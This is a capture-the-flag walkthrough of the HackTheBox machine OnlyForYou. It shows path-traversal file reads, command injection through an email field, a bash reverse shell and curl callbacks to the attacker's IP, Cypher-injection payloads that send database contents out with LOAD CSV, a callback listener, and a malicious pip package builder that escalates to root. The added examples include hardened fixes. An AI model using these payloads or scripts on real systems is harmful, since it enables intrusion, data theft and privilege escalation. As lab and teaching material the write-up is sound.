# HackTheBox - OnlyForYou
## NMAP
```bash
Nmap scan report for 10.10.11.210
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_ 256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Visiting the webserver, it redirects to `only4you.htb`.
After adding the domain name to `/etc/hosts` we can access the site.
The site is just a template, and fuzzing for files using `gobuster` doesn't yield anything.
Fuzzing for subdomains reveals a `beta` virtual host (`--hh 178` hides the default response, which is 178 characters long):
```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://only4you.htb' -H "Host: FUZZ.only4you.htb" --hh 178
```
From `beta.only4you.htb` we can download the source code of the beta site.
Looking at `app.py`, the `/download` endpoint is vulnerable to arbitrary file read (path traversal): the only protection is a check that the requested file name does not start with `..` or `../`.
An absolute path starting with `/` is never caught by that prefix check, so we can read any local file the `www-data` user has access to:
```bash
curl -X POST 'http://beta.only4you.htb/download' -d "image=/etc/passwd"
```
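The check described above, reconstructed as an added example (this is not the box's `app.py`; the function names, the uploads directory and the exact check are assumptions based on the writeup). The vulnerable version keeps the prefix check, the hardened version canonicalises the path and requires it to stay inside the uploads directory:

```python
# Added example, not the box's app.py: the prefix-only check described in the
# writeup beside a hardened version. Names and the uploads directory are assumed.
import os
from typing import Optional

UPLOAD_DIR = "/var/www/only4you.htb/beta/uploads"  # assumed directory


def resolve_download_vulnerable(image: str) -> Optional[str]:
    """Mimics the flawed check: only names that *start* with '..' or '../'
    are rejected. An absolute path such as '/etc/passwd' passes, and so does
    'x/../../etc/passwd' because the traversal is not at the start."""
    if image.startswith("..") or image.startswith("../"):
        return None
    # os.path.join discards UPLOAD_DIR entirely when `image` is absolute,
    # which is exactly why the '/etc/passwd' bypass works.
    return os.path.join(UPLOAD_DIR, image)


def resolve_download_hardened(image: str) -> Optional[str]:
    """Canonicalise first, then require the result to be a file strictly
    below UPLOAD_DIR. Absolute paths, '..' anywhere and symlinks escaping
    the directory are all rejected."""
    base = os.path.realpath(UPLOAD_DIR)
    target = os.path.realpath(os.path.join(base, image))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target
```

Use `resolve_download_hardened` style checks in place of string prefix tests: the decision is made on the canonical path that will actually be opened, not on the user-controlled string.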
Reading nginx's default site config reveals the web root of the main site.
With that path we can read the source code of the `only4you.htb` site.
Its contact form uses the `sendmessage` function from `form.py`:
```bash
curl -X POST 'http://beta.only4you.htb/download' -d "image=/var/www/only4you.htb/form.py"
```
In this function the domain part of the email address is passed to `subprocess` to run `dig txt <domain>`, after a regex has validated the email.
The regex only checks that the input *starts* with a valid address, so we can append `;` followed by our own command: validation passes, and the shell runs `dig txt uwu.com; curl 10.10.14.92`.
So our email parameter should look like this (`+` is the form-encoded space):
```bash
email=test@uwu.com;curl+10.10.14.92
```
To get a shell, create a script on our machine with a bash reverse shell payload, then use the injection to make the server fetch it with `curl` and pipe it into `bash`:
```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.92/2222 0>&1
```
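The validation bypass and the injection itself, reconstructed as an added example (not the box's `form.py`; the regex, the function names and the use of `shell=True` are assumptions drawn from the writeup). `echo` stands in for `dig txt` so the block runs offline, the shell behaviour is the same:

```python
# Added example, not the box's form.py. The regex, the function names and
# shell=True are assumptions that reproduce the flaw described in the writeup.
import re
import subprocess

# re.match() only anchors at the START of the string, so anything after a
# syntactically valid address is silently accepted.
EMAIL_RE = r"[A-Za-z0-9._-]+@[A-Za-z0-9-]+(\.[A-Za-z]{2,})+"


def issecure_vulnerable(email: str) -> bool:
    return re.match(EMAIL_RE, email) is not None


def issecure_hardened(email: str) -> bool:
    # fullmatch requires the whole string to be an address: a trailing ';'
    # or any shell metacharacter fails validation.
    return re.fullmatch(EMAIL_RE, email) is not None


def domain_of(email: str) -> str:
    # Everything after the first '@' becomes the dig argument, including
    # the injected ';command'.
    return email.split("@", 1)[1]


def lookup_vulnerable(domain: str) -> str:
    # shell=True hands one string to /bin/sh, so ';' ends the dig command and
    # starts ours. 'echo' replaces 'dig txt' to keep the example offline.
    return subprocess.run(f"echo dig txt {domain}", shell=True,
                          capture_output=True, text=True).stdout


def lookup_hardened(domain: str) -> str:
    # argv list, no shell: the domain is a single literal argument, so the
    # ';' reaches dig (here echo) as data rather than as a command separator.
    return subprocess.run(["echo", "dig", "txt", domain],
                          capture_output=True, text=True).stdout
```

Both fixes matter independently: `fullmatch` stops the payload at validation, and the argv form means that even a regex mistake cannot turn into command execution.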
Checking the listening ports with `ss -tulpn`, there's a service on local port 8001 that serves a login page.
With chisel we can forward it to our machine: start the server on the attacker box, then run the client on the target.
```bash
chisel server -p 3333 --reverse
chisel client 10.10.14.92:3333 R:localhost:8001
```
With the default credentials `admin:admin` we can log in.
## Privilege Escalation (john)
From the dashboard we can see a few tasks; one of them is about migrating the database to `neo4j`, a graph database.
The `/employees` page lets us search for an employee.
Since the backend is neo4j, the search is a Cypher query (neo4j's query language), and the search parameter is injectable. The payloads below use `LOAD CSV` to make the database fetch a URL on our machine with the query results embedded in the query string, so an HTTP listener on port 80 is needed. First, the version:
```bash
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.92/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
```
To list the labels in the database:
```bash
' OR 1=1 WITH 1 as a CALL db.labels() YIELD label LOAD CSV FROM 'http://10.10.14.92/?'+label AS b RETURN b//
```
This query returns two labels (roughly the equivalent of tables): `user` and `employee`.
Now we extract every property of the `user` nodes, one callback per property:
```bash
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.92/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
```
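The three payloads above all deliver their results as query strings on HTTP requests to our host, so a listener that decodes them and answers `200` is more useful than a bare `python3 -m http.server`. This is an added example, not part of the writeup; the request paths in it are constructed, not captured from the box:

```python
# Added example, not from the writeup: decodes the LOAD CSV callbacks made by
# the Cypher injection payloads above and flags SHA-256-looking values.
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, urlsplit

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def decode_callback(path: str) -> dict:
    """'/?username=admin' -> {'username': 'admin'}.
    Label enumeration ('/?' + label) arrives as a key with no value, so
    blank values are kept rather than dropped."""
    return dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))


def sha256_values(record: dict) -> list:
    """Values that look like raw SHA-256 hex digests, ready for hash.txt."""
    return [v for v in record.values() if SHA256_RE.match(v)]


class ExfilHandler(BaseHTTPRequestHandler):
    seen = []  # every decoded callback, in arrival order

    def do_GET(self):
        record = decode_callback(self.path)
        self.seen.append(record)
        print(f"[callback] {record}")
        for h in sha256_values(record):
            print(f"[hash] {h}")  # paste into hash.txt for john
        # An empty 200 response keeps LOAD CSV from raising an error,
        # so the query keeps running and the next callback is sent.
        self.send_response(200)
        self.send_header("Content-Type", "text/csv")
        self.end_headers()


def serve(port: int = 80) -> None:
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    serve()  # port 80 needs root: sudo python3 exfil.py
```

Because the last payload emits one request per property (`UNWIND keys(f)`), a node's `username` and `password` arrive as separate callbacks; they come back in order, so pairing them up is straightforward when reading the log.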
Each user node returns a username and a SHA-256 password hash. Cracking the two hashes with john gives john's password, which lets us switch to the `john` user on the machine:
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt --format=Raw-SHA256
```
As john, `sudo -l` shows that `/usr/bin/pip3 download` can be run as root, restricted to `.tar.gz` URLs on local port 3000. That port hosts a Gogs instance (a self-hosted git service like Gitea or GitHub), which we can reach by port forwarding the same way we did for port 8001:
```bash
chisel client 10.10.14.92:3333 R:localhost:3000
```
Under `Explore` there are two users, `admin` and `john`; john's cracked password also works for the Gogs login.
Following this article, we build a pip package whose `setup.py` runs when pip processes the download. Since pip runs as root, the code in `setup.py` can make `bash` SUID or spawn a reverse shell:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/
After building the package, upload the `.tar.gz` to the `Test` repository.
Go to the repository settings and make it public, so the raw URL is reachable without authentication.
Now run the allowed command to download the package with sudo:
```bash
sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/exploitpy-0.0.1.tar.gz
```
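The package that step needs, built as an added example with the standard library only (this is not the writeup's own package; the name `exploitpy` and version `0.0.1` are taken from the download URL above, and the payload command is an assumption you replace with your own). The point is the layout pip expects and why `setup.py` runs at all:

```python
# Added example, not the writeup's package: builds exploitpy-0.0.1.tar.gz.
# The payload command is an assumption; the name/version come from the URL.
import io
import os
import tarfile

NAME, VERSION = "exploitpy", "0.0.1"


def setup_py(payload_cmd: str) -> str:
    # pip has to run setup.py (egg_info / metadata build) to learn the
    # package's metadata before it can finish the download, so anything at
    # module top level executes as the user running pip: root under sudo.
    return (
        "import os\n"
        "from setuptools import setup\n\n"
        f"os.system({payload_cmd!r})\n\n"
        f"setup(name={NAME!r}, version={VERSION!r})\n"
    )


def pkg_info() -> str:
    return f"Metadata-Version: 2.1\nName: {NAME}\nVersion: {VERSION}\n"


def build_sdist(out_dir: str, payload_cmd: str) -> str:
    """Write NAME-VERSION.tar.gz with both files under a NAME-VERSION/
    top-level directory, the layout pip expects for an sdist."""
    top = f"{NAME}-{VERSION}"
    path = os.path.join(out_dir, f"{top}.tar.gz")
    with tarfile.open(path, "w:gz") as tar:
        for member, text in ((f"{top}/setup.py", setup_py(payload_cmd)),
                             (f"{top}/PKG-INFO", pkg_info())):
            data = text.encode()
            info = tarfile.TarInfo(member)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return path


def list_members(path: str) -> list:
    with tarfile.open(path) as tar:
        return sorted(m.name for m in tar.getmembers())


if __name__ == "__main__":
    # Assumed payload: SUID bash, then `bash -p` as john gives a root shell.
    print(build_sdist(".", "chmod u+s /bin/bash"))
```

Upload the resulting archive to the `Test` repo and run the `sudo /usr/bin/pip3 download` command above; the download "fails" after the payload has already run, which is expected.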
## References
- https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j
- https://pentester.land/blog/conf-notes-cypher-query-injection/
- https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/